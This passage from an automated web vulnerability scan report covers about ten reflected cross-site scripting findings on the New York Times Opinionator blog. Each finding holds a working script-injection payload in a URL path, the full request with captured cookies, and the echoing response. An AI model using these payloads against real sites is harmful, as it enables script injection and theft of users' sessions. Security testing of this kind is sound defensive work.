Path:	/category/errol-morris/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ca0"><script>alert(1)</script>a5cfaeb2d66 was submitted in the REST URL parameter 3. This input was echoed as 83ca0\"><script>alert(1)</script>a5cfaeb2d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/errol-morris/feed83ca0"><script>alert(1)</script>a5cfaeb2d66/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/feed83ca0\"><script>alert(1)</script>a5cfaeb2d66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.191. http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/errol-morris/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59656"><script>alert(1)</script>2a52a42ee88 was submitted in the REST URL parameter 3. This input was echoed as 59656\"><script>alert(1)</script>2a52a42ee88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/errol-morris/page59656"><script>alert(1)</script>2a52a42ee88/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/page59656\"><script>alert(1)</script>2a52a42ee88/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.192. http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/fixes

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e161d"><script>alert(1)</script>0900389e500 was submitted in the REST URL parameter 2. This input was echoed as e161d\"><script>alert(1)</script>0900389e500 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixese161d"><script>alert(1)</script>0900389e500 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixese161d\"><script>alert(1)</script>0900389e500&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.193. http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/fixes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f0e"><script>alert(1)</script>bf23dd493d7 was submitted in the REST URL parameter 2. This input was echoed as d8f0e\"><script>alert(1)</script>bf23dd493d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixesd8f0e"><script>alert(1)</script>bf23dd493d7/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixesd8f0e\"><script>alert(1)</script>bf23dd493d7&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.194. http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/fixes/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26950"><script>alert(1)</script>349cb5c2268 was submitted in the REST URL parameter 3. This input was echoed as 26950\"><script>alert(1)</script>349cb5c2268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixes/feed26950"><script>alert(1)</script>349cb5c2268/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/feed26950\"><script>alert(1)</script>349cb5c2268&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.195. http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/fixes/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f1b"><script>alert(1)</script>7880d35a107 was submitted in the REST URL parameter 3. This input was echoed as 66f1b\"><script>alert(1)</script>7880d35a107 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixes/page66f1b"><script>alert(1)</script>7880d35a107/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/page66f1b\"><script>alert(1)</script>7880d35a107/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.196. http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/home-fires

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a972"><script>alert(1)</script>0a1b042274f was submitted in the REST URL parameter 2. This input was echoed as 1a972\"><script>alert(1)</script>0a1b042274f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires1a972"><script>alert(1)</script>0a1b042274f HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires1a972\"><script>alert(1)</script>0a1b042274f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.197. http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/home-fires/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465db"><script>alert(1)</script>c3c7c9b644e was submitted in the REST URL parameter 2. This input was echoed as 465db\"><script>alert(1)</script>c3c7c9b644e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires465db"><script>alert(1)</script>c3c7c9b644e/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires465db\"><script>alert(1)</script>c3c7c9b644e&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.198. http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/home-fires/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c78f"><script>alert(1)</script>40440eb34cb was submitted in the REST URL parameter 3. This input was echoed as 2c78f\"><script>alert(1)</script>40440eb34cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires/feed2c78f"><script>alert(1)</script>40440eb34cb/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:23:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:23:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires/feed2c78f\"><script>alert(1)</script>40440eb34cb&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.199. http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/home-fires/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2385"><script>alert(1)</script>2952f429861 was submitted in the REST URL parameter 3. This input was echoed as f2385\"><script>alert(1)</script>2952f429861 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires/pagef2385"><script>alert(1)</script>2952f429861/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
